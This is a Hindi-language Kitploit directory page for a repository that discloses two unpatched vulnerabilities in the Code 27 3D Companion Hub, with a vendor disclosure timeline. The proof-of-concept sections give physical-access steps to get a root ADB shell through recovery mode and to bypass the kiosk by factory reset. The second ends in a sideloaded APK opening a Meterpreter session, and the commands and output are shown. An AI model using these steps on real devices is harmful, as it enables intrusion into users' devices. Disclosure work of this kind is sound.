Skip to content
KitploitKITPLOIT
उपकरणब्लॉग
जमा करें
उपकरणब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
Code-27-Companion-Hub-Exploits — CVE-2026-36027 और CVE-2026-36028 के लिए प्रूफ ऑफ कॉन्सेप्ट | Kitploit
उपकरण/GitHubGitHub/redr0nin/code-27-companion-hub-exploits
एंड्रॉइड सुरक्षाएम्बेडेड सिस्टम सुरक्षाविशेषाधिकार वृद्धिIoT सुरक्षाभेद्यता विश्लेषणशोषणपेनिट्रेशन टेस्टिंगहार्डवेयर सुरक्षा

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें
GitHub
redr0nin/code-27-companion-hub-exploits

Code-27-Companion-Hub-Exploits

CVE-2026-36027 और CVE-2026-36028 के लिए प्रूफ ऑफ कॉन्सेप्ट

रिपॉजिटरी देखें
112 महीने पहलेअभी तक समीक्षित नहीं

Code 27 3D Companion Hub भेद्यताएं (CVE-2026-36027, CVE-2026-36028)

Code 27 3D Companion Hub एक भौतिक डेस्कटॉप उपकरण है जो एक कस्टम AI पात्र ("Codie") को एनिमेटेड 3D साथी के रूप में प्रस्तुत करता है। उपयोगकर्ता कोई भी 3D मॉडल अपलोड या बना सकते हैं, और मल्टीमॉडल AI पात्र को अपने आस-पास देखने, स्वर और शारीरिक भाषा पढ़ने और खुले अंत वाली बातचीत करने देता है।

यह रिपोर्ट दो ऐसी भेद्यताओं को कवर करती है जिनके लिए उपकरण तक भौतिक पहुंच की आवश्यकता होती है। दोनों को नीचे दिए गए बिल्ड के विरुद्ध मान्य किया गया है और प्रकाशन के समय, अनपैच हैं।

Code 27 3D Companion Hub

प्रभावित उपकरण / बिल्ड

फ़ील्डमान
उत्पादCode 27 3D Companion Hub
Companion Hub UI संस्करण1.2.0
SoC / बोर्डRockchip RK3588S (rk3588s_yt921)
OSAndroid 12
बिल्ड IDSQ3A.220705.003.A1
पूर्ण फिंगरप्रिंटrk3588s_yt921-userdebug 12 SQ3A.220705.003.A1 eng.dj.20260203.134404 release-keys
बिल्ड प्रकारuserdebug / release-keys

शिपिंग फर्मवेयर एक userdebug बिल्ड है (रिकवरी बैनर और ro.build.display.id में दिखाई देता है)। userdebug बिल्ड adb root के माध्यम से adbd को रूट के रूप में पुनः आरंभ करने की अनुमति देते हैं, जो CVE-2026-36027 के अस्तित्व में आने का एक प्रमुख सक्षम कारक है।

Companion Hub version screen showing version 1.2.0


CVE-2026-36027 - रिकवरी में USB डिबगिंग (ADB) के माध्यम से मनमाना कोड निष्पादन

कार्यकारी सारांश

एक शारीरिक रूप से निकट का हमलावर Companion Hub को Android रिकवरी में बूट कर सकता है और रूट-विशेषाधिकार प्राप्त ADB शेल (uid=0, SELinux संदर्भ u:r:su:s0) प्राप्त कर सकता है। चूंकि उपकरण एक userdebug बिल्ड भेजता है, adbd को adb root के साथ रूट के रूप में पुनः आरंभ किया जा सकता है, जिससे हमलावर को रिकवरी वातावरण के साथ पढ़ने/लिखने की बातचीत, बिल्ड और हार्डवेयर गुणों की गणना करने की क्षमता, और रिकवरी फ़ंक्शंस (साइडलोड, फास्टबूट, पार्टीशन संचालन) तक पहुंच मिलती है।

प्राप्त पहुंच रिकवरी रैमडिस्क के भीतर है, लाइव Android रनटाइम में नहीं। परीक्षण में, रिकवरी Mount /system क्रिया विफल रही (libfs_mgr /dev/block/by-name/system नहीं खोल सका), इसलिए सिस्टम पार्टीशन इस पथ के माध्यम से सीधे माउंट नहीं हुआ था, और कियोस्क और किसी भी डिक्रिप्टेड उपयोगकर्ता डेटा के साथ बूट किया गया उपयोगकर्ता वातावरण इस मोड में प्रस्तुत नहीं होता है।

यह अभी भी मायने रखता है क्योंकि रिकवरी वातावरण में रूट पहुंच स्थायी उपकरण स्थिति को संशोधित करने का आधार है (उदाहरण के लिए, पार्टीशन में लिखना या क्राफ्टेड अपडेट पैकेज लागू करना) ताकि हमलावर-नियंत्रित कोड बाद के सामान्य बूट पर चल सके, लाइव उपकरण पर पैर जमा सके।

प्रूफ ऑफ कॉन्सेप्ट

  1. उपकरण बंद करें।
  2. एक बार उपकरण पूरी तरह से बंद हो जाए, तब तक पावर और वॉल्यूम बटन एक साथ दबाए रखें जब तक उपकरण Android रिकवरी मेनू में बूट न हो जाए।

Android रिकवरी मेनू जिसमें Mount /system हाइलाइट किया गया है

  1. एक USB-C केबल Companion Hub से और USB-A सिरा कंप्यूटर से कनेक्ट करें।
  2. बटनों का उपयोग करके Mount /system पर नेविगेट करें, इसे हाइलाइट करें, और पुष्टि करें। यह विफल होता हुआ दिखाई देगा। यह अपेक्षित है, और एक्सप्लॉइट फिर भी काम करता है। (रिकवरी लॉग libfs_mgr द्वारा /dev/block/by-name/system खोलने में विफलता दर्शाता है।)
  3. अपने कंप्यूटर पर ADB स्थापित होने पर, उपकरण सूचीबद्ध है इसकी पुष्टि करें:
root@kitploit:~
PS C:\Users\John\Downloads\platform-tools-latest-windows\platform-tools> .\adb.exe devices
List of devices attached
YGKJ2601921S00193       recovery
  1. उपकरण रिकवरी मोड में है। रूट संदर्भ में adbd को पुनः आरंभ करें:
root@kitploit:~
PS C:\Users\John\Downloads\platform-tools-latest-windows\platform-tools> .\adb.exe root
restarting adbd as root
timeout expired while waiting for device
  1. एक शेल खोलें - अब आप उपकरण पर रूट हैं:
root@kitploit:~
PS C:\Users\John\Downloads\platform-tools-latest-windows\platform-tools> .\adb.exe shell
# whoami
root
# id
uid=0(root) gid=0(root) groups=0(root),1004(input),1007(log),1011(adb),1015(sdcard_rw),1028(sdcard_r),1078(ext_data_rw),1079(ext_obb_rw),3001(net_bt_admin),3002(net_bt),3003(inet),3006(net_bw_stats),3009(readproc),3011(uhid),3012(readtracefs) context=u:r:su:s0
# getprop ro.build.display.id
rk3588s_yt921-userdebug 12 SQ3A.220705.003.A1 eng.dj.20260203.134404 release-keys
# getprop ro.product.model
rk3588s_yt921
# getprop ro.build.version.release
12
  1. रूट शेल के साथ आप रिकवरी फाइलसिस्टम की गणना और उससे बातचीत कर सकते हैं:
root@kitploit:~
# ls -la
total 840
drwxrwxrwt  33 root root     1040__bionic_open_tzdata: couldn't find any tzdata when looking for Asia/Shanghai!
 1970-01-01 00:00 .
drwxrwxrwt  33 root root     1040 1970-01-01 00:00 ..
drwxr-xr-x   2 root root       40 1970-01-01 00:00 acct
drwxr-xr-x   2 root root       40 1970-01-01 00:00 apex
lrwxrwxrwx   1 root root       11 1970-01-01 00:00 bin -> /system/bin
lrwxrwxrwx   1 root root       50 1970-01-01 00:00 bugreports -> /data/user_de/0/com.android.shell/files/bugreports
drwxr-xr-x   2 root root       40 1970-01-01 00:00 cache
drwxr-xr-x   3 root root        0 1970-01-01 00:00 config
lrwxrwxrwx   1 root root       17 1970-01-01 00:00 d -> /sys/kernel/debug
drwxr-xr-x   2 root root       40 1970-01-01 00:00 data
drwxr-xr-x   2 root root       40 1970-01-01 00:00 data_mirror
drwxr-xr-x   2 root root       40 1970-01-01 00:00 debug_ramdisk
lrwxrwxrwx   1 root root       12 1970-01-01 00:00 default.prop -> prop.default
drwxr-xr-x  15 root root     1380 1970-01-01 00:00 dev
lrwxrwxrwx   1 root root       11 1970-01-01 00:00 etc -> /system/etc
lrwxrwxrwx   1 root root       16 1970-01-01 00:00 init -> /system/bin/init
-rwxr-x---   1 root root      662 1970-01-01 00:00 init.recovery.rk30board.rc
drwxr-xr-x   2 root root       60 1970-01-01 00:00 linkerconfig
drwxr-xr-x  12 root root     4096 1970-01-01 00:00 metadata
drwxr-xr-x   8 root system    160 1970-01-01 00:00 mnt
drwxr-xr-x   2 root root      240 1970-01-01 00:00 odm
drwxr-xr-x   2 root root       60 1970-01-01 00:00 odm_dlkm
-rw-r--r--   1 root root        0 1970-01-01 00:00 odm_file_contexts
-rw-r--r--   1 root root        0 1970-01-01 00:00 odm_property_contexts
drwxr-xr-x   2 root root       40 1970-01-01 00:00 oem
drwxr-xr-x   3 root root      260 1970-01-01 00:00 pcba
-rw-r--r--   1 root root    47253 1970-01-01 00:00 plat_file_contexts
-rw-r--r--   1 root root    76958 1970-01-01 00:00 plat_property_contexts
drwxr-xr-x   2 root root       40 1970-01-01 00:00 postinstall
dr-xr-xr-x 220 root root        0 1970-01-01 00:00 proc
drwxr-xr-x   2 root root       40 1970-01-01 00:00 product
-rw-r--r--   1 root root        0 1970-01-01 00:00 product_file_contexts
-rw-r--r--   1 root root        0 1970-01-01 00:00 product_property_contexts
-rw-r--r--   1 root root    14023 1970-01-01 00:00 prop.default
drwxr-xr-x   3 root root       60 1970-01-01 00:00 res
drwx------   2 root root       40 2026-02-03 06:23 root
drwxr-xr-x   2 root root       60 1970-01-01 00:00 sbin
drwxr-xr-x   2 root root       40 1970-01-01 00:00 sdcard
drwxr-xr-x   2 root root       40 1970-01-01 00:00 second_stage_resources
-rw-r--r--   1 root root   658375 1970-01-01 00:00 sepolicy
drwxr-xr-x   2 root root       40 1970-01-01 00:00 sideload
drwxr-x--x   2 root root       40 1970-01-01 00:00 storage
dr-xr-xr-x  14 root root        0 1970-01-01 00:00 sys
drwxr-xr-x   5 root root      100 1970-01-01 00:00 system
drwxr-xr-x   2 root root       40 1970-01-01 00:00 system_ext
-rw-r--r--   1 root root      177 1970-01-01 00:00 system_ext_file_contexts
-rw-r--r--   1 root root     1889 1970-01-01 00:00 system_ext_property_contexts
drwxrwxr-x   2 root shell      40 1970-01-01 00:00 tmp
drwxr-xr-x   3 root root       60 1970-01-01 00:00 vendor
drwxr-xr-x   2 root root       60 1970-01-01 00:00 vendor_dlkm
-rw-r--r--   1 root root    25441 1970-01-01 00:00 vendor_file_contexts
-rw-r--r--   1 root root     4395 1970-01-01 00:00 vendor_property_contexts

CVE-2026-36028 - फ़ैक्टरी रीसेट के माध्यम से कियोस्क प्रतिबंध बाईपास

कार्यकारी सारांश

रिकवरी मेनू से किया गया फ़ैक्टरी रीसेट userdata पार्टीशन को मिटा देता है, जहां कियोस्क एप्लिकेशन स्थापित हैं। चूंकि कियोस्क सिस्टम पार्टीशन का हिस्सा नहीं है, यह रीबूट पर पुनर्स्थापित नहीं होता है, और उपकरण एक मानक, अप्रतिबंधित Android वातावरण (लॉन्चर, वेब ब्राउज़र, फ़ाइल प्रबंधक, सेटिंग्स और अन्य सिस्टम ऐप्स) में बूट होता है।

इस अप्रतिबंधित वातावरण से एक हमलावर डेवलपर विकल्पों/USB डिबगिंग को पुनः सक्षम कर सकता है, एक मनमाना APK साइडलोड कर सकता है, और लाइव ऑपरेटिंग सिस्टम पर एक शेल प्राप्त करने के लिए इसे निष्पादित कर सकता है। परीक्षण में, इसने एक विशेषाधिकार-रहित एप्लिकेशन उपयोगकर्ता u0_a79 के रूप में चलने वाला एक meterpreter सत्र उत्पन्न किया - रिकवरी-मोड रूट शेल CVE-2026-36027 की तुलना में एक अलग विशेषाधिकार और डेटा संदर्भ, क्योंकि यह रिकवरी रैमडिस्क के बजाय लाइव, बूट किए गए OS के विरुद्ध चलता है। इस अवस्था में लगाया और चलाया गया कोड सामान्य उपकरण संचालन के भाग के रूप में निष्पादित होता है, जिससे हमलावर को उपकरण और उसके उपयोगकर्ता-सुलभ फाइलसिस्टम पर इंटरैक्टिव नियंत्रण मिलता है।

प्रूफ ऑफ कॉन्सेप्ट

  1. उपकरण बंद करें।
  2. एक बार उपकरण पूरी तरह से बंद हो जाए, तब तक पावर और वॉल्यूम बटन एक साथ दबाए रखें जब तक उपकरण Android रिकवरी मेनू में बूट न हो जाए।
  3. Wipe data/factory reset को हाइलाइट करें और मिटाने की पुष्टि करें।

Android रिकवरी मेनू जिसमें Wipe data/factory reset हाइलाइट किया गया है

  1. एक बार उपकरण रीबूट होने पर, कियोस्क एप्लिकेशन गायब हैं और कियोस्क मोड प्रारंभ नहीं होता है। ऐसा इसलिए है क्योंकि कियोस्क एप्लिकेशन सिस्टम पार्टीशन के बजाय userdata पार्टीशन में स्थापित हैं। एक रिकवरी फ़ैक्टरी रीसेट userdata को मिटा देता है, स्थायी रूप से कियोस्क एप्लिकेशन को हटा देता है; चूंकि वे सिस्टम पार्टीशन में मौजूद नहीं हैं, वे रीबूट पर पुनर्स्थापित नहीं होते हैं और कियोस्क लॉन्च करने में विफल रहता है।
  2. हमलावर को एक अप्रतिबंधित Android वातावरण प्रस्तुत किया जाता है, जिसमें एक वेब ब्राउज़र, फ़ाइल प्रबंधक, सेटिंग्स और अन्य सिस्टम एप्लिकेशन शामिल हैं। यहां से, USB डिबगिंग सक्षम की जा सकती है और एक मनमाना APK साइडलोड और निष्पादित किया जा सकता है - इस मामले में लाइव OS पर एक Meterpreter सत्र प्राप्त होता है:
root@kitploit:~
[*] Sending stage (72424 bytes) to 10.0.0.48
[*] Meterpreter session 2 opened (10.0.0.224:8000 -> 10.0.0.48:58094) at 2026-02-20 19:06:47 -0500

meterpreter > getuid
Server username: u0_a79
meterpreter > cd /
meterpreter > ls
Listing: /
==========

Mode              Size     Type  Last modified              Name
----              ----     ----  -------------              ----
040554/r-xr-xr--  4096     dir   2008-12-31 19:00:00 -0500  acct
040554/r-xr-xr--  480      dir   1969-12-31 19:00:03 -0500  apex
040110/--x--x---  8192     dir   2008-12-31 19:00:00 -0500  bin
000000/---------  0        fif   1969-12-31 19:00:00 -0500  bugreports
040000/---------  4096     dir   1969-12-31 19:00:04 -0500  cache
040554/r-xr-xr--  0        dir   1969-12-31 19:00:00 -0500  config
040554/r-xr-xr--  0        dir   1969-12-31 19:00:00 -0500  d
040110/--x--x---  4096     dir   2026-02-03 01:27:34 -0500  data
040000/---------  120      dir   1969-12-31 19:00:04 -0500  data_mirror
040554/r-xr-xr--  4096     dir   2008-12-31 19:00:00 -0500  debug_ramdisk
040554/r-xr-xr--  1760     dir   2026-02-03 01:27:34 -0500  dev
040554/r-xr-xr--  4096     dir   2008-12-31 19:00:00 -0500  etc
100554/r-xr-xr--  1997584  fil   2008-12-31 19:00:00 -0500  init
100000/---------  463      fil   2008-12-31 19:00:00 -0500  init.environ.rc
040554/r-xr-xr--  240      dir   1969-12-31 19:00:03 -0500  linkerconfig
040000/---------  16384    dir   2008-12-31 19:00:00 -0500  lost+found
040554/r-xr-xr--  4096     dir   1969-12-31 19:00:04 -0500  metadata
040554/r-xr-xr--  360      dir   1969-12-31 19:00:05 -0500  mnt
040554/r-xr-xr--  3488     dir   2026-01-18 22:15:55 -0500  odm
040554/r-xr-xr--  3488     dir   2026-01-18 22:15:55 -0500  odm_dlkm
040554/r-xr-xr--  4096     dir   2008-12-31 19:00:00 -0500  oem
040554/r-xr-xr--  4096     dir   2008-12-31 19:00:00 -0500  postinstall
040554/r-xr-xr--  0        dir   1969-12-31 19:00:02 -0500  proc
040554/r-xr-xr--  3488     dir   2026-01-18 22:15:55 -0500  product
040776/rwxrwxrw-  3452     dir   2026-02-03 01:27:39 -0500  sdcard
040554/r-xr-xr--  4096     dir   2008-12-31 19:00:00 -0500  second_stage_resources
040110/--x--x---  80       dir   1969-12-31 19:00:04 -0500  storage
040554/r-xr-xr--  0        dir   1969-12-31 19:00:02 -0500  sys
040554/r-xr-xr--  3488     dir   2026-01-18 22:15:54 -0500  system
040554/r-xr-xr--  3488     dir   2026-01-18 22:15:55 -0500  system_ext
040554/r-xr-xr--  3488     dir   2026-01-18 22:15:54 -0500  vendor
040554/r-xr-xr--  3488     dir   2026-01-18 22:15:55 -0500  vendor_dlkm

प्रकटीकरण समयरेखा

टूल डाउनलोड करें
तिथिघटना
2026-02-17दोनों भेद्यताएं Code 27 टीम को प्रकट की गईं और पुष्टि की गईं।
2026-02-17दोनों 0-दिवसीय भेद्यताएं MITRE को रिपोर्ट की गईं।
2026-02-18Code 27 टीम ने समाधान की योजना पर चर्चा की, अतिरिक्त जानकारी एकत्र की, और कहा कि इसे ठीक किया जाएगा।
2026-06-15MITRE ने CVE-2026-36027 और CVE-2026-36028 आवंटित किए।
2026-06-15Code 27 को आवंटन के बारे में सूचित किया गया; प्रारंभिक संपर्क बिल्ड समीक्षा के लिए सुरक्षा टीम को जानकारी अग्रेषित करता है।
2026-06-16Code 27 सुरक्षा टीम ने फिर से पूर्ण तकनीकी विवरण मांगा।
2026-06-17पूर्ण तकनीकी विवरण सुरक्षा टीम को फिर से प्रदान किए गए।
2026-06-18सुरक्षा टीम से कोई प्रतिक्रिया नहीं।
2026-06-19Code 27 प्रतिनिधि ने कहा कि कंपनियों को सुरक्षा मुद्दों को हल करने के लिए आमतौर पर 90 दिन दिए जाते हैं और सुरक्षा टीम पहले से ही जानती है। प्रतिनिधि को सूचित किया गया कि मुद्दे 120 दिन पहले रिपोर्ट किए गए थे। 1 जुलाई का प्रकटीकरण समय सीमा निर्धारित की गई।
2026-06-25Code 27 सुरक्षा से समय सीमा और प्रकाशन की अंतिम चेतावनी की पुष्टि करने के लिए संपर्क किया गया।
2026-06-28Code 27 ने माफी मांगी, CVE पहचानकर्ताओं और प्रकटीकरण समय सीमा की पुष्टि की, और कहा कि 1 जुलाई से पहले एक सार्वजनिक सलाह और लिंक भेजा जाएगा।
2026-07-01सलाह की स्थिति के बारे में Code 27 से संपर्क किया गया; कोई प्रतिक्रिया नहीं।
2026-07-02अनपैच भेद्यता विवरण प्रकाशित किए गए।